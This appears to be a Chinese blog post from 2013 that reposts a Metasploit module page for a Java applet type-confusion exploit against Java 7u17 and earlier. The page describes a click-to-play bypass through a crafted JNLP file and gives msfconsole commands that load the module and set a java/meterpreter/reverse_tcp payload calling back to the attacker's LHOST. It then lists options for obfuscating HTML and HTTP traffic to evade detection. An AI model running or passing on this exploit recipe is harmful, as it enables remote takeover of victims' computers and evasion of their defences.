2013年4月27日 星期六

Java Applet Reflection Type Confusion Remote Code Execution

http://www.metasploit.com/modules/exploit/multi/browser/java_jre17_reflection_types

This module abuses Java Reflection to generate a Type Confusion, due to a weak access control when setting final fields on static classes, and run code outside of the Java Sandbox. The vulnerability affects Java version 7u17 and earlier. This exploit bypasses click-to-play throw a specially crafted JNLP file. This bypass is applied mainly to IE, when Java Web Start can be launched automatically throw the ActiveX control. Otherwise the applet is launched without click-to-play bypass.
Search Other Modules

Exploit Rank

  • Excellent

Exploit Authors

  • Jeroen Frijters < >
  • juan vazquez < juan.vazquez [at] metasploit.com >

Vulnerability References


Exploit Targets

  • 0 - Generic (Java Payload) (default)
  • 1 - Windows x86 (Native Payload)
  • 2 - Mac OS X x86 (Native Payload)
  • 3 - Linux x86 (Native Payload)

Exploit Development


Similar Exploit Modules


Exploit Usage Information

$ msfconsole

                ##                          ###           ##    ##
 ##  ##  #### ###### ####  #####   #####    ##    ####        ######
####### ##  ##  ##  ##         ## ##  ##    ##   ##  ##   ###   ##
####### ######  ##  #####   ####  ##  ##    ##   ##  ##   ##    ##
## # ##     ##  ##  ##  ## ##      #####    ##   ##  ##   ##    ##
##   ##  #### ###   #####   #####     ##   ####   ####   #### ###
                                      ##

msf > use exploit/multi/browser/java_jre17_reflection_types
msf exploit(java_jre17_reflection_types) > show payloads
msf exploit(java_jre17_reflection_types) > set PAYLOAD java/meterpreter/reverse_tcp
msf exploit(java_jre17_reflection_types) > set LHOST [MY IP ADDRESS]
msf exploit(java_jre17_reflection_types) > exploit

Exploit Module Options

SRVHOSTThe local host to listen on. This must be an address on the local machine or 0.0.0.0 (default: 0.0.0.0)
SRVPORTThe local port to listen on. (default: 8080)
SSLNegotiate SSL for incoming connections
SSLCertPath to a custom SSL certificate (default is randomly generated)
SSLVersionSpecify the version of SSL that should be used (accepted: SSL2, SSL3, TLS1) (default: SSL3)
URIPATHThe URI to use for this exploit (default is random)
ContextInformationFileThe information file that contains context information
DisablePayloadHandlerDisable the handler code for the selected payload
EXE::CustomUse custom exe instead of automatically generating a payload exe
EXE::FallBackUse the default template in case the specified one is missing
EXE::InjectSet to preserve the original EXE function
EXE::OldMethodSet to use the substitution EXE generation method.
EXE::PathThe directory in which to look for the executable template
EXE::TemplateThe executable template file name.
EnableContextEncodingUse transient context when encoding payloads
ListenerCommThe specific communication channel to use for this service
VERBOSEEnable detailed status messages
WORKSPACESpecify the workspace for this module
HTML::base64Enable HTML obfuscation via an embeded base64 html object (IE not supported) (accepted: none, plain, single_pad, double_pad, random_space_injection)
HTML::javascript::escapeEnable HTML obfuscation via HTML escaping (number of iterations)
HTML::unicodeEnable HTTP obfuscation via unicode (accepted: none, utf-16le, utf-16be, utf-16be-marker, utf-32le, utf-32be)
HTTP::chunkedEnable chunking of HTTP responses via "Transfer-Encoding: chunked"
HTTP::compressionEnable compression of HTTP responses via content encoding (accepted: none, gzip, deflate)
HTTP::header_foldingEnable folding of HTTP headers
HTTP::junk_headersEnable insertion of random junk HTTP headers
HTTP::server_nameConfigures the Server header of all outgoing replies
TCP::max_send_sizeMaximum tcp segment size. (0 = disable)
TCP::send_delayDelays inserted before every send. (0 = disable)

沒有留言:

張貼留言